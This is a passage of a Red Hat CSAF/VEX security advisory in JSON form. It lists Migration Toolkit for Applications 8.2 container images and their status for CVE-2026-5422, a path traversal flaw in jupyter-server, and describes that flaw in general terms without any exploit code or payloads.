"purl": "pkg:oci/mta-platform-addon-rhel9@sha256%3A647ca556be4338749fbe7cb18580466ce6155bfce17c96deda7b7c037fd16240?arch=arm64\u0026repository_url=registry.redhat.io/mta/mta-platform-addon-rhel9\u0026tag=1784059659"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/mta/mta-python-external-provider-rhel9@sha256:25618ee8a690f336e1604a1b1ca9dd5197bbdea5cd02cfaf588fbd950a8fd228_arm64",
"product": {
"name": "registry.redhat.io/mta/mta-python-external-provider-rhel9@sha256:25618ee8a690f336e1604a1b1ca9dd5197bbdea5cd02cfaf588fbd950a8fd228_arm64",
"product_id": "registry.redhat.io/mta/mta-python-external-provider-rhel9@sha256:25618ee8a690f336e1604a1b1ca9dd5197bbdea5cd02cfaf588fbd950a8fd228_arm64",
"product_identification_helper": {
"purl": "pkg:oci/mta-python-external-provider-rhel9@sha256%3A25618ee8a690f336e1604a1b1ca9dd5197bbdea5cd02cfaf588fbd950a8fd228?arch=arm64\u0026repository_url=registry.redhat.io/mta/mta-python-external-provider-rhel9\u0026tag=1784162359"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/mta/mta-solution-server-rhel9@sha256:f8c8651cc5fa016003ef4105f28775e0b225472d2c3135e5f37d1e1f748c515e_arm64",
"product": {
"name": "registry.redhat.io/mta/mta-solution-server-rhel9@sha256:f8c8651cc5fa016003ef4105f28775e0b225472d2c3135e5f37d1e1f748c515e_arm64",
"product_id": "registry.redhat.io/mta/mta-solution-server-rhel9@sha256:f8c8651cc5fa016003ef4105f28775e0b225472d2c3135e5f37d1e1f748c515e_arm64",
"product_identification_helper": {
"purl": "pkg:oci/mta-solution-server-rhel9@sha256%3Af8c8651cc5fa016003ef4105f28775e0b225472d2c3135e5f37d1e1f748c515e?arch=arm64\u0026repository_url=registry.redhat.io/mta/mta-solution-server-rhel9\u0026tag=1784109883"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/mta/mta-ui-rhel9@sha256:f59dcacb1eed9bcd539bc6c26a630115cf35378d77075247fb42219836e2adb7_arm64",
"product": {
"name": "registry.redhat.io/mta/mta-ui-rhel9@sha256:f59dcacb1eed9bcd539bc6c26a630115cf35378d77075247fb42219836e2adb7_arm64",
"product_id": "registry.redhat.io/mta/mta-ui-rhel9@sha256:f59dcacb1eed9bcd539bc6c26a630115cf35378d77075247fb42219836e2adb7_arm64",
"product_identification_helper": {
"purl": "pkg:oci/mta-ui-rhel9@sha256%3Af59dcacb1eed9bcd539bc6c26a630115cf35378d77075247fb42219836e2adb7?arch=arm64\u0026repository_url=registry.redhat.io/mta/mta-ui-rhel9\u0026tag=1783962515"
}
}
}
],
"category": "architecture",
"name": "arm64"
}
],
"category": "vendor",
"name": "Red Hat"
}
],
"relationships": [
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/mta/mta-analyzer-addon-rhel9@sha256:1e20ac649ee7fdcdad9930b1f0384e10c8794db9a2f211d4e3d1679c0c10cc53_amd64 as a component of Red Hat Migration Toolkit for Applications 8.2",
"product_id": "Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-analyzer-addon-rhel9@sha256:1e20ac649ee7fdcdad9930b1f0384e10c8794db9a2f211d4e3d1679c0c10cc53_amd64"
},
"product_reference": "registry.redhat.io/mta/mta-analyzer-addon-rhel9@sha256:1e20ac649ee7fdcdad9930b1f0384e10c8794db9a2f211d4e3d1679c0c10cc53_amd64",
"relates_to_product_reference": "Red Hat Migration Toolkit for Applications 8.2"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/mta/mta-analyzer-addon-rhel9@sha256:907c0c8c40c1fb494caa5feac439b90754160bf3f79d8e76cf2dded63f549db6_arm64 as a component of Red Hat Migration Toolkit for Applications 8.2",
"product_id": "Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-analyzer-addon-rhel9@sha256:907c0c8c40c1fb494caa5feac439b90754160bf3f79d8e76cf2dded63f549db6_arm64"
},
"product_reference": "registry.redhat.io/mta/mta-analyzer-addon-rhel9@sha256:907c0c8c40c1fb494caa5feac439b90754160bf3f79d8e76cf2dded63f549db6_arm64",
"relates_to_product_reference": "Red Hat Migration Toolkit for Applications 8.2"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/mta/mta-cli-rhel9@sha256:d466bf042711b13fc53cbc561b70e4f58cd77f8a05d1d4ee10c10a6e1c201fe7_amd64 as a component of Red Hat Migration Toolkit for Applications 8.2",
"product_id": "Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-cli-rhel9@sha256:d466bf042711b13fc53cbc561b70e4f58cd77f8a05d1d4ee10c10a6e1c201fe7_amd64"
},
"product_reference": "registry.redhat.io/mta/mta-cli-rhel9@sha256:d466bf042711b13fc53cbc561b70e4f58cd77f8a05d1d4ee10c10a6e1c201fe7_amd64",
"relates_to_product_reference": "Red Hat Migration Toolkit for Applications 8.2"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/mta/mta-cli-rhel9@sha256:ecae0c1053637d609a19773757c0ea8b336b645950a42473015daabfe9677fab_arm64 as a component of Red Hat Migration Toolkit for Applications 8.2",
"product_id": "Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-cli-rhel9@sha256:ecae0c1053637d609a19773757c0ea8b336b645950a42473015daabfe9677fab_arm64"
},
"product_reference": "registry.redhat.io/mta/mta-cli-rhel9@sha256:ecae0c1053637d609a19773757c0ea8b336b645950a42473015daabfe9677fab_arm64",
"relates_to_product_reference": "Red Hat Migration Toolkit for Applications 8.2"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/mta/mta-discovery-addon-rhel9@sha256:7377a2c2f16ca436819cbbf106fc27d3a8c44c7fca0a44108ccc826bf8678ace_arm64 as a component of Red Hat Migration Toolkit for Applications 8.2",
"product_id": "Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-discovery-addon-rhel9@sha256:7377a2c2f16ca436819cbbf106fc27d3a8c44c7fca0a44108ccc826bf8678ace_arm64"
},
"product_reference": "registry.redhat.io/mta/mta-discovery-addon-rhel9@sha256:7377a2c2f16ca436819cbbf106fc27d3a8c44c7fca0a44108ccc826bf8678ace_arm64",
"relates_to_product_reference": "Red Hat Migration Toolkit for Applications 8.2"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/mta/mta-discovery-addon-rhel9@sha256:a72cbf7b2ba6420e31ecca15f7d3628a671dd642a6ccf4610c5a26462a5d4b36_amd64 as a component of Red Hat Migration Toolkit for Applications 8.2",
"product_id": "Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-discovery-addon-rhel9@sha256:a72cbf7b2ba6420e31ecca15f7d3628a671dd642a6ccf4610c5a26462a5d4b36_amd64"
},
"product_reference": "registry.redhat.io/mta/mta-discovery-addon-rhel9@sha256:a72cbf7b2ba6420e31ecca15f7d3628a671dd642a6ccf4610c5a26462a5d4b36_amd64",
"relates_to_product_reference": "Red Hat Migration Toolkit for Applications 8.2"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/mta/mta-dotnet-external-provider-rhel9@sha256:794180378ddb9a88001d76b849df305034924683a79ef145f744fe03bee9c32b_amd64 as a component of Red Hat Migration Toolkit for Applications 8.2",
"product_id": "Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-dotnet-external-provider-rhel9@sha256:794180378ddb9a88001d76b849df305034924683a79ef145f744fe03bee9c32b_amd64"
},
"product_reference": "registry.redhat.io/mta/mta-dotnet-external-provider-rhel9@sha256:794180378ddb9a88001d76b849df305034924683a79ef145f744fe03bee9c32b_amd64",
"relates_to_product_reference": "Red Hat Migration Toolkit for Applications 8.2"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/mta/mta-dotnet-external-provider-rhel9@sha256:b5d66f8d4c6d6680886e631296c927c9502817fbb823a680f1dabf1cc92e0465_arm64 as a component of Red Hat Migration Toolkit for Applications 8.2",
"product_id": "Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-dotnet-external-provider-rhel9@sha256:b5d66f8d4c6d6680886e631296c927c9502817fbb823a680f1dabf1cc92e0465_arm64"
},
"product_reference": "registry.redhat.io/mta/mta-dotnet-external-provider-rhel9@sha256:b5d66f8d4c6d6680886e631296c927c9502817fbb823a680f1dabf1cc92e0465_arm64",
"relates_to_product_reference": "Red Hat Migration Toolkit for Applications 8.2"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/mta/mta-go-external-provider-rhel9@sha256:8e5ba3659ef5f88b81c1c9d795b6af6048fd7d870493ce5f013efcb9fce90b9d_amd64 as a component of Red Hat Migration Toolkit for Applications 8.2",
"product_id": "Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-go-external-provider-rhel9@sha256:8e5ba3659ef5f88b81c1c9d795b6af6048fd7d870493ce5f013efcb9fce90b9d_amd64"
},
"product_reference": "registry.redhat.io/mta/mta-go-external-provider-rhel9@sha256:8e5ba3659ef5f88b81c1c9d795b6af6048fd7d870493ce5f013efcb9fce90b9d_amd64",
"relates_to_product_reference": "Red Hat Migration Toolkit for Applications 8.2"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/mta/mta-go-external-provider-rhel9@sha256:8f91d460985e1a97ac6892d26c0517f39871d94d1b3bfad005d58d424bed2b0b_arm64 as a component of Red Hat Migration Toolkit for Applications 8.2",
"product_id": "Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-go-external-provider-rhel9@sha256:8f91d460985e1a97ac6892d26c0517f39871d94d1b3bfad005d58d424bed2b0b_arm64"
},
"product_reference": "registry.redhat.io/mta/mta-go-external-provider-rhel9@sha256:8f91d460985e1a97ac6892d26c0517f39871d94d1b3bfad005d58d424bed2b0b_arm64",
"relates_to_product_reference": "Red Hat Migration Toolkit for Applications 8.2"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/mta/mta-hub-rhel9@sha256:0223927b9e584f302aabafdbf015a779b14c9b5816cf0baa0cb1bfe0b1cc3415_arm64 as a component of Red Hat Migration Toolkit for Applications 8.2",
"product_id": "Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-hub-rhel9@sha256:0223927b9e584f302aabafdbf015a779b14c9b5816cf0baa0cb1bfe0b1cc3415_arm64"
},
"product_reference": "registry.redhat.io/mta/mta-hub-rhel9@sha256:0223927b9e584f302aabafdbf015a779b14c9b5816cf0baa0cb1bfe0b1cc3415_arm64",
"relates_to_product_reference": "Red Hat Migration Toolkit for Applications 8.2"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/mta/mta-hub-rhel9@sha256:2e251b0343327f2ac6e60d2888da526be6a82a355310f1aea93011426cddc485_amd64 as a component of Red Hat Migration Toolkit for Applications 8.2",
"product_id": "Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-hub-rhel9@sha256:2e251b0343327f2ac6e60d2888da526be6a82a355310f1aea93011426cddc485_amd64"
},
"product_reference": "registry.redhat.io/mta/mta-hub-rhel9@sha256:2e251b0343327f2ac6e60d2888da526be6a82a355310f1aea93011426cddc485_amd64",
"relates_to_product_reference": "Red Hat Migration Toolkit for Applications 8.2"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/mta/mta-java-external-provider-rhel9@sha256:60c4a45085db3517f6a9bae32a4b93fd2dfa799c3e957776ad2d8ab0777507c2_arm64 as a component of Red Hat Migration Toolkit for Applications 8.2",
"product_id": "Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-java-external-provider-rhel9@sha256:60c4a45085db3517f6a9bae32a4b93fd2dfa799c3e957776ad2d8ab0777507c2_arm64"
},
"product_reference": "registry.redhat.io/mta/mta-java-external-provider-rhel9@sha256:60c4a45085db3517f6a9bae32a4b93fd2dfa799c3e957776ad2d8ab0777507c2_arm64",
"relates_to_product_reference": "Red Hat Migration Toolkit for Applications 8.2"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/mta/mta-java-external-provider-rhel9@sha256:e8bd699e851fbab4466d1d25e3a08e2bcf8997978cb7f19f509c627be42d03dd_amd64 as a component of Red Hat Migration Toolkit for Applications 8.2",
"product_id": "Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-java-external-provider-rhel9@sha256:e8bd699e851fbab4466d1d25e3a08e2bcf8997978cb7f19f509c627be42d03dd_amd64"
},
"product_reference": "registry.redhat.io/mta/mta-java-external-provider-rhel9@sha256:e8bd699e851fbab4466d1d25e3a08e2bcf8997978cb7f19f509c627be42d03dd_amd64",
"relates_to_product_reference": "Red Hat Migration Toolkit for Applications 8.2"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/mta/mta-nodejs-external-provider-rhel9@sha256:12883516af95bf0f6abad1556d22896f16a087c1e4191fedc1f5d689cf6d67f6_amd64 as a component of Red Hat Migration Toolkit for Applications 8.2",
"product_id": "Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-nodejs-external-provider-rhel9@sha256:12883516af95bf0f6abad1556d22896f16a087c1e4191fedc1f5d689cf6d67f6_amd64"
},
"product_reference": "registry.redhat.io/mta/mta-nodejs-external-provider-rhel9@sha256:12883516af95bf0f6abad1556d22896f16a087c1e4191fedc1f5d689cf6d67f6_amd64",
"relates_to_product_reference": "Red Hat Migration Toolkit for Applications 8.2"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/mta/mta-nodejs-external-provider-rhel9@sha256:a89c4d19ff39a406f3279b4ffd6f8d2a2a82a78ab3e9aa1dc0f2c385a24fa844_arm64 as a component of Red Hat Migration Toolkit for Applications 8.2",
"product_id": "Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-nodejs-external-provider-rhel9@sha256:a89c4d19ff39a406f3279b4ffd6f8d2a2a82a78ab3e9aa1dc0f2c385a24fa844_arm64"
},
"product_reference": "registry.redhat.io/mta/mta-nodejs-external-provider-rhel9@sha256:a89c4d19ff39a406f3279b4ffd6f8d2a2a82a78ab3e9aa1dc0f2c385a24fa844_arm64",
"relates_to_product_reference": "Red Hat Migration Toolkit for Applications 8.2"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/mta/mta-operator-bundle@sha256:94f88bf557a036c54b348c2689c699a720d5d347b1bba141feec273e624ccdbf_amd64 as a component of Red Hat Migration Toolkit for Applications 8.2",
"product_id": "Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-operator-bundle@sha256:94f88bf557a036c54b348c2689c699a720d5d347b1bba141feec273e624ccdbf_amd64"
},
"product_reference": "registry.redhat.io/mta/mta-operator-bundle@sha256:94f88bf557a036c54b348c2689c699a720d5d347b1bba141feec273e624ccdbf_amd64",
"relates_to_product_reference": "Red Hat Migration Toolkit for Applications 8.2"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/mta/mta-platform-addon-rhel9@sha256:647ca556be4338749fbe7cb18580466ce6155bfce17c96deda7b7c037fd16240_arm64 as a component of Red Hat Migration Toolkit for Applications 8.2",
"product_id": "Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-platform-addon-rhel9@sha256:647ca556be4338749fbe7cb18580466ce6155bfce17c96deda7b7c037fd16240_arm64"
},
"product_reference": "registry.redhat.io/mta/mta-platform-addon-rhel9@sha256:647ca556be4338749fbe7cb18580466ce6155bfce17c96deda7b7c037fd16240_arm64",
"relates_to_product_reference": "Red Hat Migration Toolkit for Applications 8.2"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/mta/mta-platform-addon-rhel9@sha256:f421044ff3d6911097aebcbabfac87ddad74987e0e5f18a96dd89454f46a4cdf_amd64 as a component of Red Hat Migration Toolkit for Applications 8.2",
"product_id": "Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-platform-addon-rhel9@sha256:f421044ff3d6911097aebcbabfac87ddad74987e0e5f18a96dd89454f46a4cdf_amd64"
},
"product_reference": "registry.redhat.io/mta/mta-platform-addon-rhel9@sha256:f421044ff3d6911097aebcbabfac87ddad74987e0e5f18a96dd89454f46a4cdf_amd64",
"relates_to_product_reference": "Red Hat Migration Toolkit for Applications 8.2"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/mta/mta-python-external-provider-rhel9@sha256:25618ee8a690f336e1604a1b1ca9dd5197bbdea5cd02cfaf588fbd950a8fd228_arm64 as a component of Red Hat Migration Toolkit for Applications 8.2",
"product_id": "Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-python-external-provider-rhel9@sha256:25618ee8a690f336e1604a1b1ca9dd5197bbdea5cd02cfaf588fbd950a8fd228_arm64"
},
"product_reference": "registry.redhat.io/mta/mta-python-external-provider-rhel9@sha256:25618ee8a690f336e1604a1b1ca9dd5197bbdea5cd02cfaf588fbd950a8fd228_arm64",
"relates_to_product_reference": "Red Hat Migration Toolkit for Applications 8.2"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/mta/mta-python-external-provider-rhel9@sha256:4f46867f5ff78e9e970bc572a1a625080ae8faea29dc098d3d7d4355e8350ca1_amd64 as a component of Red Hat Migration Toolkit for Applications 8.2",
"product_id": "Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-python-external-provider-rhel9@sha256:4f46867f5ff78e9e970bc572a1a625080ae8faea29dc098d3d7d4355e8350ca1_amd64"
},
"product_reference": "registry.redhat.io/mta/mta-python-external-provider-rhel9@sha256:4f46867f5ff78e9e970bc572a1a625080ae8faea29dc098d3d7d4355e8350ca1_amd64",
"relates_to_product_reference": "Red Hat Migration Toolkit for Applications 8.2"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/mta/mta-rhel9-operator@sha256:3926f791376886972749cae0f8eb635af67a088811214066c6deb010c6b762f0_amd64 as a component of Red Hat Migration Toolkit for Applications 8.2",
"product_id": "Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-rhel9-operator@sha256:3926f791376886972749cae0f8eb635af67a088811214066c6deb010c6b762f0_amd64"
},
"product_reference": "registry.redhat.io/mta/mta-rhel9-operator@sha256:3926f791376886972749cae0f8eb635af67a088811214066c6deb010c6b762f0_amd64",
"relates_to_product_reference": "Red Hat Migration Toolkit for Applications 8.2"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/mta/mta-rhel9-operator@sha256:957a553608cbf9ed108c22f851ef809ed348cf592610851c3a554f3342ba511a_arm64 as a component of Red Hat Migration Toolkit for Applications 8.2",
"product_id": "Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-rhel9-operator@sha256:957a553608cbf9ed108c22f851ef809ed348cf592610851c3a554f3342ba511a_arm64"
},
"product_reference": "registry.redhat.io/mta/mta-rhel9-operator@sha256:957a553608cbf9ed108c22f851ef809ed348cf592610851c3a554f3342ba511a_arm64",
"relates_to_product_reference": "Red Hat Migration Toolkit for Applications 8.2"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/mta/mta-solution-server-rhel9@sha256:21fab4b77580795980fd60b24ab1d6a3cc159a9246beccd1c19938bca94edd23_amd64 as a component of Red Hat Migration Toolkit for Applications 8.2",
"product_id": "Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-solution-server-rhel9@sha256:21fab4b77580795980fd60b24ab1d6a3cc159a9246beccd1c19938bca94edd23_amd64"
},
"product_reference": "registry.redhat.io/mta/mta-solution-server-rhel9@sha256:21fab4b77580795980fd60b24ab1d6a3cc159a9246beccd1c19938bca94edd23_amd64",
"relates_to_product_reference": "Red Hat Migration Toolkit for Applications 8.2"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/mta/mta-solution-server-rhel9@sha256:f8c8651cc5fa016003ef4105f28775e0b225472d2c3135e5f37d1e1f748c515e_arm64 as a component of Red Hat Migration Toolkit for Applications 8.2",
"product_id": "Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-solution-server-rhel9@sha256:f8c8651cc5fa016003ef4105f28775e0b225472d2c3135e5f37d1e1f748c515e_arm64"
},
"product_reference": "registry.redhat.io/mta/mta-solution-server-rhel9@sha256:f8c8651cc5fa016003ef4105f28775e0b225472d2c3135e5f37d1e1f748c515e_arm64",
"relates_to_product_reference": "Red Hat Migration Toolkit for Applications 8.2"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/mta/mta-ui-rhel9@sha256:a77f5a731c20943958b5f654bf3147b690d5dd608b794bff261a23dd89f785f1_amd64 as a component of Red Hat Migration Toolkit for Applications 8.2",
"product_id": "Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-ui-rhel9@sha256:a77f5a731c20943958b5f654bf3147b690d5dd608b794bff261a23dd89f785f1_amd64"
},
"product_reference": "registry.redhat.io/mta/mta-ui-rhel9@sha256:a77f5a731c20943958b5f654bf3147b690d5dd608b794bff261a23dd89f785f1_amd64",
"relates_to_product_reference": "Red Hat Migration Toolkit for Applications 8.2"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/mta/mta-ui-rhel9@sha256:f59dcacb1eed9bcd539bc6c26a630115cf35378d77075247fb42219836e2adb7_arm64 as a component of Red Hat Migration Toolkit for Applications 8.2",
"product_id": "Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-ui-rhel9@sha256:f59dcacb1eed9bcd539bc6c26a630115cf35378d77075247fb42219836e2adb7_arm64"
},
"product_reference": "registry.redhat.io/mta/mta-ui-rhel9@sha256:f59dcacb1eed9bcd539bc6c26a630115cf35378d77075247fb42219836e2adb7_arm64",
"relates_to_product_reference": "Red Hat Migration Toolkit for Applications 8.2"
}
]
},
"vulnerabilities": [
{
"cve": "CVE-2026-5422",
"cwe": {
"id": "CWE-22",
"name": "Improper Limitation of a Pathname to a Restricted Directory (\u0027Path Traversal\u0027)"
},
"discovery_date": "2026-06-02T10:01:06.656531+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-analyzer-addon-rhel9@sha256:1e20ac649ee7fdcdad9930b1f0384e10c8794db9a2f211d4e3d1679c0c10cc53_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-analyzer-addon-rhel9@sha256:907c0c8c40c1fb494caa5feac439b90754160bf3f79d8e76cf2dded63f549db6_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-cli-rhel9@sha256:d466bf042711b13fc53cbc561b70e4f58cd77f8a05d1d4ee10c10a6e1c201fe7_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-cli-rhel9@sha256:ecae0c1053637d609a19773757c0ea8b336b645950a42473015daabfe9677fab_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-discovery-addon-rhel9@sha256:7377a2c2f16ca436819cbbf106fc27d3a8c44c7fca0a44108ccc826bf8678ace_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-discovery-addon-rhel9@sha256:a72cbf7b2ba6420e31ecca15f7d3628a671dd642a6ccf4610c5a26462a5d4b36_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-dotnet-external-provider-rhel9@sha256:794180378ddb9a88001d76b849df305034924683a79ef145f744fe03bee9c32b_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-dotnet-external-provider-rhel9@sha256:b5d66f8d4c6d6680886e631296c927c9502817fbb823a680f1dabf1cc92e0465_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-go-external-provider-rhel9@sha256:8e5ba3659ef5f88b81c1c9d795b6af6048fd7d870493ce5f013efcb9fce90b9d_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-go-external-provider-rhel9@sha256:8f91d460985e1a97ac6892d26c0517f39871d94d1b3bfad005d58d424bed2b0b_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-hub-rhel9@sha256:0223927b9e584f302aabafdbf015a779b14c9b5816cf0baa0cb1bfe0b1cc3415_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-hub-rhel9@sha256:2e251b0343327f2ac6e60d2888da526be6a82a355310f1aea93011426cddc485_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-java-external-provider-rhel9@sha256:60c4a45085db3517f6a9bae32a4b93fd2dfa799c3e957776ad2d8ab0777507c2_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-java-external-provider-rhel9@sha256:e8bd699e851fbab4466d1d25e3a08e2bcf8997978cb7f19f509c627be42d03dd_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-nodejs-external-provider-rhel9@sha256:12883516af95bf0f6abad1556d22896f16a087c1e4191fedc1f5d689cf6d67f6_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-nodejs-external-provider-rhel9@sha256:a89c4d19ff39a406f3279b4ffd6f8d2a2a82a78ab3e9aa1dc0f2c385a24fa844_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-operator-bundle@sha256:94f88bf557a036c54b348c2689c699a720d5d347b1bba141feec273e624ccdbf_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-platform-addon-rhel9@sha256:647ca556be4338749fbe7cb18580466ce6155bfce17c96deda7b7c037fd16240_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-platform-addon-rhel9@sha256:f421044ff3d6911097aebcbabfac87ddad74987e0e5f18a96dd89454f46a4cdf_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-python-external-provider-rhel9@sha256:25618ee8a690f336e1604a1b1ca9dd5197bbdea5cd02cfaf588fbd950a8fd228_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-python-external-provider-rhel9@sha256:4f46867f5ff78e9e970bc572a1a625080ae8faea29dc098d3d7d4355e8350ca1_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-rhel9-operator@sha256:3926f791376886972749cae0f8eb635af67a088811214066c6deb010c6b762f0_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-rhel9-operator@sha256:957a553608cbf9ed108c22f851ef809ed348cf592610851c3a554f3342ba511a_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-ui-rhel9@sha256:a77f5a731c20943958b5f654bf3147b690d5dd608b794bff261a23dd89f785f1_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-ui-rhel9@sha256:f59dcacb1eed9bcd539bc6c26a630115cf35378d77075247fb42219836e2adb7_arm64"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2484037"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in jupyter-server. This path traversal vulnerability exists due to insufficient validation of file paths, specifically an incorrect root directory boundary check and improper handling of directory traversal sequences. This allows a remote attacker with low privileges to bypass directory restrictions and gain unauthorized read and write access to files in sibling directories. This could lead to the exposure of sensitive data, particularly in shared hosting environments.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "jupyter-server: jupyter-server: Sensitive data exposure via path traversal vulnerability",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "This Moderate vulnerability in jupyter-server allows a remote, low-privileged attacker to bypass directory restrictions. An incorrect root directory boundary check and improper handling of traversal sequences enable unauthorized read and write access to files in sibling directories. This poses a risk of sensitive data exposure, particularly in Red Hat OpenShift AI deployments utilizing shared hosting environments.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-solution-server-rhel9@sha256:21fab4b77580795980fd60b24ab1d6a3cc159a9246beccd1c19938bca94edd23_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-solution-server-rhel9@sha256:f8c8651cc5fa016003ef4105f28775e0b225472d2c3135e5f37d1e1f748c515e_arm64"
],
"known_not_affected": [
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-analyzer-addon-rhel9@sha256:1e20ac649ee7fdcdad9930b1f0384e10c8794db9a2f211d4e3d1679c0c10cc53_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-analyzer-addon-rhel9@sha256:907c0c8c40c1fb494caa5feac439b90754160bf3f79d8e76cf2dded63f549db6_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-cli-rhel9@sha256:d466bf042711b13fc53cbc561b70e4f58cd77f8a05d1d4ee10c10a6e1c201fe7_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-cli-rhel9@sha256:ecae0c1053637d609a19773757c0ea8b336b645950a42473015daabfe9677fab_arm64",
